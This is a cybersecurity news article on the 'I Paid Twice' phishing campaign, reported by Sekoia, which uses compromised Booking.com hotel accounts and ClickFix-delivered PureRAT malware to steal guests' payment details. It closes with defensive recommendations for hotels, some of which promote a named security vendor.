Cybercriminals have launched a highly convincing phishing campaign targeting both Booking.com hotels and their guests, exploiting stolen credentials, compromised accounts, and realistic messages that appear to come directly from the platform. According to Sekoia.io, this global campaign – dubbed “I Paid Twice” – has been active since at least April 2025 and remains ongoing, affecting hospitality businesses and travelers worldwide.
According to Sekoia, The attack begins with compromised Booking.com partner accounts, typically belonging to hotels or property managers. Threat actors use these legitimate accounts to send fraudulent messages via email or WhatsApp, making their communication appear authentic. Victims receive messages containing accurate reservation details such as booking IDs, guest names, and check-in dates, further increasing credibility.
The messages warn of alleged payment verification or booking issues, prompting guests to “reconfirm” their banking details through a malicious link. Once clicked, victims are redirected to a phishing page mimicking Booking.com’s payment portal, where their personal and financial information is stolen.
Behind the scenes, investigators found that many hotel systems were previously infected with infostealing malware, likely PureRAT (PureCoder’s Remote Access Trojan), which harvested booking credentials and granted attackers ongoing access to hotel booking dashboards.
ClickFix: A Sophisticated Infection Chain
The campaign employs a multi-stage social engineering technique known as ClickFix, which tricks victims into executing a malicious PowerShell command under the guise of a CAPTCHA verification step. Once executed, this command downloads and installs PureRAT malware, giving attackers full control over the system.
PureRAT enables extensive surveillance and manipulation, including keystroke logging, webcam access, data theft, and remote control of infected devices. Infected hotel systems are then used to send new waves of phishing messages, creating a self-sustaining fraud loop that spreads rapidly across the hospitality sector.
The Underground Cybercrime Economy
Sekoia analysts discovered that Booking.com credentials and partner accounts are being openly traded on Russian-speaking cybercrime forums. These credentials—sold individually or in bulk—can fetch anywhere from $5 to $5,000 depending on the account’s value, the number of managed properties, and the volume of bookings.
One threat actor, known as moderator_booking, has reportedly earned over $20 million selling stolen booking accounts and logs. These marketplaces also advertise “log checking” tools, enabling criminals to test whether stolen credentials remain valid, further industrializing the exploitation process.
This reflects a broader professionalization of cybercrime. Attackers now outsource specific stages of their operations, such as credential harvesting, traffic distribution, and phishing kit development, to specialized partners in what’s known as a “cybercrime-as-a-service” ecosystem.
Impact on Hotels, Guests, and the Industry
The implications for the global hospitality industry are significant. Hotels risk losing customer trust, financial damages, and access to their Booking.com portals. Guests face potential credit card fraud, data breaches, and identity theft.
This campaign highlights how trust-based platforms—where users rely on verified brands for secure transactions—can become high-value targets for cybercriminals once insider credentials are compromised.
In regions like the Middle East and Africa, where the travel and tourism industry plays a key economic role, such attacks could have broader repercussions. Many hotels rely heavily on Booking.com and similar platforms for bookings, making them particularly vulnerable if cybersecurity hygiene is weak or outsourced.
10 Key Recommendations for Hotels and Security Teams
- Implement Multi-Factor Authentication (MFA) for all Booking.com and related partner accounts to prevent unauthorized access.
- Conduct regular cybersecurity awareness training through trusted programs such as Saintynet Cybersecurity Training to educate staff about phishing and social engineering.
- Restrict administrative privileges and continuously monitor account activity for unusual logins or behavior.
- Patch systems and update antivirus software regularly to detect and block malware such as PureRAT and QuirkyLoader.
- Monitor outgoing emails and network traffic for signs of compromised systems being used to send phishing messages.
- Verify all communication channels with customers—ensure messages are sent exclusively through secure Booking.com interfaces.
- Avoid clicking on links or attachments in unsolicited emails that claim to concern booking or payment issues.
- Backup business data frequently and store it securely offline to ensure quick recovery in case of compromise.
- Engage a trusted cybersecurity partner such as Saintynet Cybersecurity for managed threat monitoring, detection, and response.
- Report phishing incidents immediately to Booking.com support and national cybersecurity authorities to help prevent further attacks.
Conclusion
As the hospitality industry continues its digital transformation, phishing and malware-based frauds are evolving into targeted, organized, and highly profitable ecosystems. The “I Paid Twice” campaign is a stark reminder that even trusted platforms can become conduits for cybercrime when threat actors weaponize legitimate accounts.
Cybersecurity teams, hotel operators, and travelers alike must remain vigilant, investing in security awareness, endpoint protection, and proactive monitoring. Defending digital trust requires collaboration between platforms, cybersecurity firms, and users, because the cost of paying twice is far greater than one missed reservation.
